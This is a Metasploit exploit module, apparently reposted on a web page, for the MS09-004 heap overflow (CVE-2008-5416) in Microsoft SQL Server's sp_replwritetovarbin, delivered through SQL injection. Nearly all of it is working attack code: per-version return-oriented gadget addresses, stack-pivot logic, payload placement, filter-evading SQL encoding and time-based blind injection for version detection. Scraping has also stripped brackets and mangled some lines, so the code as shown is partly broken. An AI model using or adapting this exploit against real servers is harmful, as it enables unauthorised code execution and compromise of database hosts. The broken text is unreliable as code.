
CVE-2008-5416 Microsoft SQL Server 2000缓冲区溢出漏洞




# $Id: ms09_004_sp_replwritetovarbin_sqli.rb 11631 2011-01-24 19:37:58Z jduck $

# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::MSSQL_SQLI

  def initialize(info = {})

      'Name'           => 'Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection',
      'Description'    => %q{
          A heap-based buffer overflow can occur when calling the undocumented
        "sp_replwritetovarbin" extended stored procedure. This vulnerability affects
        all versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database,
        and Microsoft Desktop Engine (MSDE) without the updates supplied in MS09-004.
        Microsoft patched this vulnerability in SP3 for 2005 without any public

        This exploit smashes several pointers, as shown below.

        1. pointer to a 32-bit value that is set to 0
        2. pointer to a 32-bit value that is set to a length influcenced by the buffer
        3. pointer to a 32-bit value that is used as a vtable pointer. In MSSQL 2000,
          this value is referenced with a displacement of 0x38. For MSSQL 2005, the
          displacement is 0x10. The address of our buffer is conveniently stored in
          ecx when this instruction is executed.
        4. On MSSQL 2005, an additional vtable ptr is smashed, which is referenced with
          a displacement of 4. This pointer is not used by this exploit.

        This particular exploit replaces the previous dual-method exploit. It uses
        a technique where the value contained in ecx becomes the stack. From there,
        return oriented programming is used to normalize the execution state and
        finally execute the payload via a "jmp esp". All addresses used were found
        within the sqlservr.exe memory space, yielding very reliable code execution
        using only a single query.

        NOTE: The MSSQL server service does not automatically restart by default. That
        said, some exceptions are caught and will not result in terminating the process.
        If the exploit crashes the service prior to hijacking the stack, it won't die.
        Otherwise, it's a goner.
      'Author'         =>
          'jduck',          # MS09-004 base exploit
          'Rodrigo Marcos'  # SQL Injection mods
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 11631 $',
      'References'     =>
           'OSVDB', '50589' ,
           'CVE', '2008-5416' ,
           'BID', '32710' ,
           'MSB', 'MS09-004' ,
           'URL', 'http://www.milw0rm.com/exploits/7501' ,
           'URL', 'http://www.secforce.co.uk/blog/2011/01/exploiting-ms09-004-via-sql-injection/' 
      'DefaultOptions' =>
          'EXITFUNC' => 'seh',
               'InitialAutoRunScript' => 'migrate -f'
      'Payload'        =>
          'Space'    => 512,
          'BadChars' => "", # bad bytes get encoded!
          'PrependEncoder' => "\x81\xc4\xf0\xef\xff\xff",
          'DisableNops' => true
      'Platform'       => 'win',
      'Privileged'     => true,
      'Targets'        =>
          # auto targeting!
           'Automatic', { } ,

          # Individual targets
            # Microsoft SQL Server  2000 - 8.00.194 (Intel X86)
            # Aug  6 2000 00:57:48
            'MSSQL 2000 / MSDE SP0 (8.00.194)',
              'Num'      => 32,          # value for "start_offset"
              'VtOff'    => -13,         # offset from 'Num' to smashed vtable ptr
              'VtDisp'   => 0x38,        # displacement from call eax+0x38 crash
              'Writable' => 0x42b6cfe0,  # any writable addr (not even necessary really)
              'Vtable'   => 0x00a87f26,  # becomes eax for eax+0x38 (must be valid to exec)
              'FixDisp'  => 0x6900a7,    # not directly used - call ecx+0x08
              'Disp'     => 0x08,        # displacement on call ecx+disp used
              'ecx2esp'  => 0x0041b78f,  # xchg ecx,esp / sbb eax,al / pop esi / ret
              'Popped'   => 0x4,         # byte count popped in above (before ret)
              'Offset'   => 0x28,        # offset to the new stack!
              'FixESP'   => 0x0071f5fb,  # advance esp to next ret (add esp,0x20 / ret)
              'Ret'      => 0x0041c9a2   # jmp esp

            # Microsoft SQL Server  2000 - 8.00.384 (Intel X86)
            # May 23 2001 00:02:52
            'MSSQL 2000 / MSDE SP1 (8.00.384)',
              'Num'      => 32,          # value for "start_offset"
              'VtOff'    => -13,         # offset from 'Num' to smashed vtable ptr
              'VtDisp'   => 0x38,        # displacement from call eax+0x38 crash
              'Writable' => 0x42b6cfe0,  # any writable addr (not even necessary really)
              'Vtable'   => 0x00a95b2f,  # becomes eax for eax+0x38 (must be valid to exec)
              'FixDisp'  => 0x4b4f00,    # not directly used - call ecx-0x18
              'Disp'     => 0x34,        # displacement on call ecx+disp used
              'ecx2esp'  => 0x0044d300,  # xchg ecx,esp / add eax,al / add edi+0x5e,bl / pop ebx / pop ebp / ret
              'Popped'   => 0x8,         # byte count popped in above (before ret)
              'Offset'   => 0x28,        # offset to the new stack!
              'FixESP'   => 0x004a2ce9,  # advance esp to next ret (add esp,0x1c / ret)
              'Ret'      => 0x004caa15   # jmp esp

            # Microsoft SQL Server  2000 - 8.00.534 (Intel X86)
            # Nov 19 2001 13:23:50
            'MSSQL 2000 / MSDE SP2 (8.00.534)',
              'Num'      => 32,          # value for "start_offset"
              'VtOff'    => -13,         # offset from 'Num' to smashed vtable ptr
              'VtDisp'   => 0x38,        # displacement from call eax+0x38 crash
              'Writable' => 0x42b6cfe0,  # any writable addr (not even necessary really)
              'Vtable'   => 0x00a64f7e,  # becomes eax for eax+0x38 (must be valid to exec)
              'FixDisp'  => 0x660077,    # not directly used - call ecx-0x18
              'Disp'     => 0x34,        # displacement on call ecx+disp used
              'ecx2esp'  => 0x0054131c,  # xchg ecx,esp / add eax,al / add edi+0x5e,bl / pop ebx / pop ebp / ret
              'Popped'   => 0x8,         # byte count popped in above (before ret)
              'Offset'   => 0x28,        # offset to the new stack!
              'FixESP'   => 0x005306a0,  # advance esp to next ret (add esp,0x1c / ret)
              'Ret'      => 0x004ca984   # jmp esp

            # Microsoft SQL Server  2000 - 8.00.760 (Intel X86)
            # Dec 17 2002 14:22:05
            'MSSQL 2000 / MSDE SP3 (8.00.760)',
              'Num'      => 32,          # value for "start_offset"
              'VtOff'    => -13,         # offset from 'Num' to smashed vtable ptr
              'VtDisp'   => 0x38,        # displacement from call eax+0x38 crash
              'Writable' => 0x42b6cfe0,  # any writable addr (not even necessary really)
              'Vtable'   => 0x00ac344e,  # becomes eax for eax+0x38 (must be valid to exec)
              'FixDisp'  => 0x490074,    # not directly used - call ecx+0x14
              'Disp'     => 0x34,        # displacement on call ecx+disp used
              'ecx2esp'  => 0x00454303,  # xchg ecx,esp / add eax,al / add edi+0x5e,bl / pop ebx / pop ebp / ret
              'Popped'   => 0x8,         # byte count popped in above (before ret)
              'Offset'   => 0x28,        # offset to the new stack!
              'FixESP'   => 0x00503413,  # advance esp to next ret (add esp,0x20 / ret)
              'Ret'      => 0x0043fa97   # jmp esp

            # Microsoft SQL Server  2000 - 8.00.2039 (Intel X86)
            # May  3 2005 23:18:38
            'MSSQL 2000 / MSDE SP4 (8.00.2039)',
              'Num'      => 32,          # value for "start_offset"
              'VtOff'    => -13,         # offset from 'Num' to smashed vtable ptr
              'VtDisp'   => 0x38,        # displacement from call eax+0x38 crash
              'Writable' => 0x42b6cfe0,  # any writable addr (not even necessary really)
              'Vtable'   => 0x0046592e,  # becomes eax for eax+0x38 (must be valid to exec)
              'FixDisp'  => 0x69f5e8,    # not directly used - call ecx+0x14
              'Disp'     => 0x14,        # displacement on call ecx+disp used
              'ecx2esp'  => 0x007b39a8,  # push ecx / pop esp / mov ax,eax+0x18 / mov ecx+0x62,ax / pop ebp / ret 0x4
              'Popped'   => 0x4,         # byte count popped in above (before ret)
              'Offset'   => 0x20,        # offset to the new stack!
              'FixESP'   => 0x00b3694d,  # advance esp to next ret (add esp,0x20 / ret)
              'Ret'      => 0x0047c89d   # jmp esp

            # Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
            # Oct 14 2005 00:33:37
            'MSSQL 2005 SP0 (9.00.1399.06)',
              'Num'      => 32,          # value for "start_offset"
              'VtOff'    => 63,          # offset from 'Num' to smashed vtable ptr
              'VtDisp'   => 0x10,        # displacement from mov eax,edx+0x10 / call eax crash
              'Writable' => 0x53ad5330,  # any writable addr (not even necessary really)
              'Vtable'   => 0x02201ca8,  # becomes eax for eax+0x38 (must be valid to exec)
              'FixDisp'  => 0x10e860f,   # not directly used - call ecx+0x14
              'Disp'     => 0x50,        # displacement on call ecx+disp used
              'ecx2esp'  => 0x0181c0d4,  # push ecx / pop esp / pop ebp / ret
              'Popped'   => 0x4,         # byte count popped in above (before ret)
              'Offset'   => 0x20,        # offset to the new stack!
              'FixESP'   => 0x0147deb7,  # advance esp to next ret (add esp,0x10 / ret)
              'Ret'      => 0x0112c2c7   # jmp esp

            # Microsoft SQL Server 2005 - 9.00.2047.00 (Intel X86)
            # Apr 14 2006 01:12:25
            'MSSQL 2005 SP1 (9.00.2047.00)',
              'Num'      => 32,          # value for "start_offset"
              'VtOff'    => 63,          # offset from 'Num' to smashed vtable ptr
              'VtDisp'   => 0x10,        # displacement from mov eax,edx+0x10 / call eax crash
              'Writable' => 0x53ad5330,  # any writable addr (not even necessary really)
              'Vtable'   => 0x0244c803,  # becomes eax for eax+0x38 (must be valid to exec)
              'FixDisp'  => 0x17139e9,   # not directly used - call ecx+0x14
              'Disp'     => 0x52,        # displacement on call ecx+disp used
              'ecx2esp'  => 0x0183bf9c,  # push ecx / pop esp / pop ebp / ret
              'Popped'   => 0x4,         # byte count popped in above (before ret)
              'Offset'   => 0x20,        # offset to the new stack!
              'FixESP'   => 0x014923c1,  # advance esp to next ret (add esp,0x10 / ret)
              'Ret'      => 0x011b204c   # jmp esp

            # Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86)
            # Feb  9 2007 22:47:07
            'MSSQL 2005 SP2 (9.00.3042.00)',
              'Num'      => 32,          # value for "start_offset"
              'VtOff'    => 63,          # offset from 'Num' to smashed vtable ptr
              'VtDisp'   => 0x10,        # displacement from mov eax,edx+0x10 / call eax crash
              'Writable' => 0x53ad5330,  # any writable addr (not even necessary really)
              'Vtable'   => 0x027fca52,  # becomes eax for eax+0x38 (must be valid to exec)
              'FixDisp'  => 0x1106d6b,   # not directly used - call ecx+0x14
              'Disp'     => 0x52,        # displacement on call ecx+disp used
              'ecx2esp'  => 0x01849641,  # push ecx / pop esp / pop ebp / ret
              'Popped'   => 0x4,         # byte count popped in above (before ret)
              'Offset'   => 0x20,        # offset to the new stack!
              'FixESP'   => 0x01498b22,  # advance esp to next ret (add esp,0x10 / ret)
              'Ret'      => 0x010a5379   # jmp esp

           'CRASHER', { } 
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Dec 09 2008'

        OptBool.new('VERBOSE',  false, 'Enable verbose output', false )

  def check
    # the ping to port 1434 method has two drawbacks...
    # #1, it doesn't work on mssql 2005 or newer (localhost only listening)
    # #2, it doesn't give an accurate version number (sp/os)

    # since we need to have credentials for this vuln, we just login and run a query
    # to get the version information
    if not (version = mssql_query_version)
      return Exploit::CheckCode::Safe
    print_status("@@version returned:\n\t" + version)

    # Any others?
    return Exploit::CheckCode::Vulnerable if (version =~ /8\.00\.194/)
    return Exploit::CheckCode::Vulnerable if (version =~ /8\.00\.384/)
    return Exploit::CheckCode::Vulnerable if (version =~ /8\.00\.534/)
    return Exploit::CheckCode::Vulnerable if (version =~ /8\.00\.760/)
    return Exploit::CheckCode::Vulnerable if (version =~ /8\.00\.2039/)
    return Exploit::CheckCode::Vulnerable if (version =~ /9\.00\.1399\.06/)
    return Exploit::CheckCode::Vulnerable if (version =~ /9\.00\.2047\.00/)
    return Exploit::CheckCode::Vulnerable if (version =~ /9\.00\.3042\.00/)
    return Exploit::CheckCode::Safe

  def exploit

    mytarget = nil
    if target.name =~ /Automatic/
      print_status("Attempting automatic target detection...")

      version = mssql_query_version
      raise RuntimeError, "Unable to get version!" if not version

      if (version =~ /8\.00\.194/)
        mytarget = targets1
      elsif (version =~ /8\.00\.384/)
        mytarget = targets2
      elsif (version =~ /8\.00\.534/)
        mytarget = targets3
      elsif (version =~ /8\.00\.760/)
        mytarget = targets4
      elsif (version =~ /8\.00\.2039/)
        mytarget = targets5
      elsif (version =~ /9\.00\.1399\.06/)
        mytarget = targets6
      elsif (version =~ /9\.00\.2047\.00/)
        mytarget = targets7
      elsif (version =~ /9\.00\.3042\.00/)
        mytarget = targets8

      if mytarget.nil?
        raise RuntimeError, "Unable to automatically detect the target"
        print_status("Automatically detected target \"#{mytarget.name}\"")
      mytarget = target

    sqlquery = %Q|declare @i int,@z nvarchar(4000)
set @z='declare @e int,@b varbinary,@l int;'
set @email protected+'exec sp_replwritetovarbin %NUM%,@e out,@b out,@l out,''%STUFF%'',@l,@l,@l,@l,@l,@l,@l,@l'
exec sp_executesql @z|

    # just crash it with a pattern buffer if the CRASHER target is selected..
    if mytarget.name == 'CRASHER'
      sploit = Rex::Text.pattern_create(2048)
      print_status("Attempting to corrupt memory to cause an exception!")
      num = 32
      # trigger the memory corruption
      num = mytarget'Num'
      vt_off = mytarget'VtOff'
      vt_disp = mytarget'VtDisp'
      vtable = mytarget'Vtable'
      ecx_disp = mytarget'Disp'
      esp_off = mytarget'Offset'
      hijack_esp = mytarget'ecx2esp'
      first_esp = mytarget'Popped'
      fix_esp = mytarget'FixESP'
      writable = mytarget'Writable'
      corruptable_bytes = 0x44

      # make sploit buff
      sz = (num + vt_off) + esp_off + (2 + corruptable_bytes) + payload.encoded.length
      #sploit = Rex::Text.pattern_create(sz)
      sploit = rand_text_alphanumeric(sz)

      # remove displacement! (using call ecx+displacement)
      vtable_off = (num + vt_off)
      sploitvtable_off,4 = (vtable - vt_disp).pack('V')

      # stack -> heap
      hijack_off = vtable_off + ecx_disp
      sploithijack_off,4 = hijack_esp.pack('V')
      # becomes eax on mssql 2ksp4 (prevent crash)
      sploit(vtable_off-4),4 = writable.pack('V')

      # becomes eip after esp hijack
      fixesp_off = vtable_off + first_esp
      sploitfixesp_off,4 = fix_esp.pack('V')

      # rest of magic stack (disable DEP?)
      stack_off = vtable_off + esp_off
      stack = 
      stack << mytarget'Ret'
      stack = stack.pack('V*')
      # jump over the stuff that gets corrupted
      stack << "\xeb" + corruptable_bytes.pack('C')
      stack << rand_text_alphanumeric(corruptable_bytes)
      stack << payload.encoded
      sploitstack_off,stack.length = stack

      # this has to be put in after the stack area since the ptr for sql2k sp1 is in the corrupted stuff
      sploithijack_off,4 = hijack_esp.pack('V')

      print_status("Redirecting flow to %#x via call to our faked vtable ptr @ %#x" % mytarget'FixDisp', vtable)

    # encode chars that get modified
    enc = mssql_encode_string(sploit)

    # put the number in (start offset)
    runme = sqlquery.gsub(/%NUM%/, num.to_s)
    runme.gsub!(/%STUFF%/, enc)

    # go!
    print_status('The SQL Server will probably die after exploitation. Follow the "POSTEXPLOITATION" instructions in the README file')
      mssql_query(runme, datastore'VERBOSE')
    rescue ::Errno::ECONNRESET, EOFError
      print_error("Error: #{$!}")


  def mssql_str_to_chars(str)
    ret = ""
    str.unpack('C*').each do |ch|
      ret += "+" if ret.length > 0
      ret += "char("
      ret << ch.to_s
      ret += ")"
    return ret

  def mssql_encode_string(str)
    badchars = "\x00\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8e\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9e\x9f"

    enc = ""
    in_str = true
    str.unpack('C*').each do |ch|
      # double-double single quotes
      if ch == 0x27
        if not in_str
          enc << "+'"
          in_str = true
        enc << ch.chr * 4

      # double backslashes
      if ch == 0x5c
        if not in_str
          enc << "+'"
          in_str = true
        enc << ch.chr * 2

      # convert any bad stuff to char(0xXX)
      if ((idx = badchars.index(ch.chr)))
        enc << "'" if in_str
        enc << "+char(0x%x)" % ch
        in_str = false
        enc << "+'" if not in_str
        enc << ch.chr
        in_str = true
    enc << "+'" if not in_str
    return enc

  def mssql_query_version
    delay = 5

    # Let's first check that we can reach the host with no problems
    t = Time.now
    res = mssql_query("select @@version",datastore'VERBOSE')
    response_time = Time.now-t
    if (response_time > delay)
      return nil

    # Now we test the SQL Server versions
    versions = %w8.00.194 8.00.384 8.00.534 8.00.760 8.00.2039 9.00.1399.06 9.00.2047.00 9.00.3042.00
    versions.each_with_index { |version,i|
      t = Time.now
      res = mssql_query("if ((select PATINDEX('%#{version}%', @@version))>0)WAITFOR DELAY '00:00:#{delay.to_s}'",datastore'VERBOSE')
      response_time = Time.now-t
      if (response_time > delay)
        return version

    return nil

